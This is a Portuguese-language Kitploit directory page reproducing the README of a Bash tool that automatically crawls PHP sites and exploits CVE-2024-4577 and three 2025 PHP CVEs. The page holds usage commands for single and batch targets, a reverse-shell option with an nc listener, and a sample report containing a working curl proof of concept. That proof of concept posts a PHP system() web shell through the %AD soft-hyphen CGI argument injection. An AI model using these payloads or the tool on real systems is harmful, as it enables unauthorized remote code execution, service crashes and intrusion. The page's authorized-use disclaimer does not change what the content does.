Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PHP_8.1.x_Exploit — Detecção e exploração automatizada de vulnerabilidades críticas do PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
Ferramentas/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
ReconhecimentoScanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoComando e ControleRastreadorFerramenta de Acesso Remoto
GitHubgl1tch0x1/php_8.1.x_exploit
13há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

PHP_8.1.x_Exploit

Detecção e exploração automatizada de vulnerabilidades críticas do PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

Ver Repositório
Compartilhar

🚀 PHP CVE Autopilot

Detecção e exploração automatizada de vulnerabilidades críticas do PHP (bypass CVE-2024-4577, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh é uma ferramenta de avaliação de segurança de arquivo único e zero configuração que descobre automaticamente endpoints PHP vulneráveis e explora quatro CVEs de alto impacto que afetam versões do PHP anteriores a 8.1.34 (lançada em dezembro de 2024). Não requer nenhuma criação manual de payload – basta fornecer uma URL e o script faz o resto, desde o rastreamento até a execução remota de código. Totalmente autopilot – detecta e explora automaticamente sem prompts do usuário.

Funcionalidades

  • Piloto automático totalmente autônomo – dada uma única URL, ele rastreia, identifica, testa e explora sem interação do usuário.
  • Escaneamento em lote – forneça uma lista de alvos e execute em paralelo.
  • Rastreamento avançado – extrai links e formulários da página inicial para melhor descoberta.
  • Identificação de SO e versão do PHP – evita ataques exclusivos do Windows no Linux, verifica a versão do PHP.
  • Bypass CVE-2024-4577 (injeção de argumento CGI no Windows)
    • Detecta e explora endpoints PHP-CGI vulneráveis.
    • Reverse shell opcional (PowerShell one‑liner).
    • Dois sabores de injeção: padrão -d e bypass com hífen soft %AD.
  • CVE-2025-14177 – vazamento de memória heap via getimagesize()
    • Cria dinamicamente um JPEG malformado e o submete automaticamente a qualquer endpoint de upload descoberto.
    • Detecta memória vazada nas respostas.
  • Escaneamento local profundo via RCE (quando o CVE-2024-4577 é explorado)
    • Envia um scanner PHP leve que testa:
      • CVE-2025-14180 – desreferência de ponteiro NULL no PDO PostgreSQL.
      • CVE-2025-14178 – estouro de inteiro em array_merge.
  • Rastreamento inteligente – extrai links e formulários para descobrir scripts CGI e páginas de upload.
  • Execução paralela – usa parallel se disponível, e falha graciosamente caso contrário.
  • Modos verbose e debug – veja cada requisição HTTP e decisão.
  • Geração de relatório – salva todas as descobertas em um arquivo de texto.
  • Limpo e seguro – arquivos temporários destruídos ao sair, timeouts evitam travamentos.
  • Requisitos

    DependênciaPropósitoGeralmente instalada?
    bash 4.0+Interpretador de scriptSim (Linux/macOS)
    curlRequisições HTTPSim
    grep, sed, awkProcessamento de textoSim
    mktempCriação de arquivo temporárioSim
    (opcional) parallelEscaneamento em lote mais rápidoNão (mas recomendado)
    (opcional) jqFormatação de saída JSONNão

    Nenhum privilégio de root necessário – a ferramenta apenas envia requisições HTTP e opcionalmente executa um reverse shell (requer um listener na sua máquina).

    Instalação

    root@kitploit:~
    git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
    cd PHP_8.1.x_Exploit
    chmod +x PHP8.1.x_Exploit.sh
    

    Uso

    Alvo único (mais comum)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.example.com
    

    Alvo único com reverse shell (CVE-2024-4577)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444
    

    Então na sua máquina:

    root@kitploit:~
    nc -lvnp 4444
    

    Escaneamento em lote de múltiplos alvos

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -l targets.txt --threads 10
    

    Exemplo targets.txt:

    root@kitploit:~
    http://192.168.1.1/
    https://10.0.0.5:8080/
    http://internal-app.company.com
    

    Modo apenas escaneamento (sem tentativas de exploração)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only
    

    Salvar relatório em arquivo

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt
    

    Saída verbose / debug

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
    ./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # muito ruidoso
    

    Como funciona (fases)

    FaseAção
    1Identificação – SO e versão do PHP a partir de cabeçalhos e sondagens.
    2Rastreamento – extrai atributos href e action da página inicial.
    3Descoberta de CGI – tenta caminhos comuns e links rastreados que parecem CGI.
    4Teste CVE‑2024‑4577 – injeta ambos os payloads -d e %AD; se bem-sucedido, executa comandos ou envia reverse shell.
    5Descoberta de endpoint de upload – verifica caminhos de upload comuns e quaisquer formulários contendo 'upload'/'image'.
    6Teste CVE‑2025‑14177 – cria um JPEG malformado, faz POST para cada endpoint de upload, detecta vazamentos de heap.
    7Escaneamento interno profundo – se RCE for alcançado, envia um script PHP scanner e o executa para testar CVE‑2025‑14180 / CVE‑2025‑14178.
    8Relatório – imprime um resumo e opcionalmente escreve em um arquivo.

    Opções de linha de comando (referência completa)

    OpçãoDescrição
    -u URLURL de alvo único (ex.: http://example.com/)
    -l FILEArquivo em lote com uma URL por linha
    --scan-onlyApenas detectar – não explorar (sem reverse shell, sem upload de payloads)
    -o FILEEscrever relatório final em FILE
    --threads NNúmero de threads paralelas para escaneamento em lote (padrão: 5)
    --timeout NTimeout HTTP em segundos (padrão: 10)
    --no-colorDesabilitar saída colorida
    --verboseMostrar progresso detalhado
    --debugMostrar cada requisição HTTP (pode expor dados sensíveis)
    --revshell IP PORTATentar reverse shell quando CVE‑2024‑4577 for encontrado
    -h, --helpExibir ajuda e sair

    CVEs cobertos em detalhes

    CVESeveridadeImpactoVetor de exploraçãoCorrigido em
    CVE‑2024‑4577 (bypass)CríticoRCEInjeção de argumento CGI no Windows (mapeamento de hífen soft)PHP 8.1.34
    CVE‑2025‑14177Médio/AltoVazamento de informações (memória heap)JPEG malformado passado para getimagesize()PHP 8.1.34
    CVE‑2025‑14180AltoDoS (desreferência NULL)PDO PostgreSQL com prepares emulados + parâmetro malformado \x99PHP 8.1.34
    CVE‑2025‑14178Alto (8.2)DoS / potencial corrupção de memóriaarray_merge() com arrays enormes causando estouro de inteiroPHP 8.1.34

    Nota: CVE‑2025‑14180 e CVE‑2025‑14178 só podem ser detectados com precisão de dentro do servidor (testes locais). O script faz isso enviando um scanner após um exploit CGI bem-sucedido.

    📸 Exemplo de saída

    root@kitploit:~
    [*] Scanning: http://192.168.1.100/
    [*] OS: windows
    [*] PHP version: 8.1.33
    [*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
    [✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
    [*] Attempting reverse shell to 192.168.1.5 4444
    ...
    [*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
    [-] CVE-2025-14177: Potential heap leak detected!
    ...
    [*] Running deep local scan via RCE...
    PHP_VERSION=8.1.33
    CVE-2025-14180: VULNERABLE
    CVE-2025-14178: VULNERABLE
    CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)
    
    ===================== Report for http://192.168.1.100/ =====================
    OS: windows
    PHP: 8.1.33
    CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
    PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
    CVE-2025-14177: VULNERABLE
    CVE-2025-14180/14178: VULNERABLE (see deep scan output)
    ==============================================================
    

    ⚠️ Avisos importantes e disclaimer

    • Modo autopilot – A ferramenta explora vulnerabilidades automaticamente sem prompts. Use apenas em alvos autorizados.
    • Uso legal apenas – Esta ferramenta destina-se a avaliações de segurança autorizadas, testes de penetração e fins educacionais. Usá-la contra sistemas sem permissão é ilegal na maioria das jurisdições.
    • Sem garantia – O software é fornecido "COMO ESTÁ", sem garantias de qualquer tipo.
    • Potencial para danos – Exploits podem derrubar serviços (CVE-2025-14180) ou corromper memória (CVE-2025-14178). Não execute em sistemas de produção sem consentimento explícito.
    • Reverse shell – A opção --revshell abre um socket do alvo para sua máquina. Certifique-se de que tem o direito de conectar de volta.
    • Registro – Suas requisições aparecerão nos logs de acesso/erro do alvo. Use com responsabilidade.

    🛠️ Solução de problemas

    ProblemaSolução
    curl: comando não encontradoInstale curl
    GNU parallel não encontradoIgnorado – script funciona sem ele (escaneamento em lote mais lento)
    Nenhum endpoint CGI encontradoO alvo pode não usar CGI, ou está atrás de um WAF que bloqueia flags -d
    CVE-2024-4577 funciona mas reverse shell falhaVerifique o firewall; tente um payload mais simples com --scan-only e um listener nc manual
    Teste de vazamento de imagem sempre retorna "Sem vazamento"O endpoint de upload pode não usar getimagesize(), ou ele limpa dados binários
    Falha no upload do scanner localA raiz web pode não ser gravável; o script tenta escrever no mesmo diretório que o script CGI

    🤝 Contribuindo

    Pull requests, relatórios de bugs e sugestões de funcionalidades são bem-vindos. Por favor, siga:

    • Mantenha o script de arquivo único e Bash puro.
    • Teste com e sem parallel.
    • Atualize este README conforme necessário.

    📜 Licença

    GNU General Public License v3.0 – veja o arquivo LICENSE.

    📚 Referências

    • Anúncio de lançamento do PHP 8.1.34
    • Detalhe do CVE-2024-4577 (NVD)
    • CVE-2025-14177 / 14178 / 14180 (NVD)
    • Mapeamento de caracteres Best-Fit do Windows

    Feito com 🧠 para a comunidade de segurança. Use eticamente.

    Baixar ferramenta